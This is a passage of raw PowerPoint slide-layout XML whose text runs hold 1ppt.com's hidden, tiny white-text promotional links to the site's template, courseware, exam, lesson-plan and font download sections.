              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout226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26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26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26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2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27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27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27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27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27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27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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout227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27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27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27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2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28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28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28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28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28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28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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout228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28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28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28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2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29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29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29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29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29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29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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
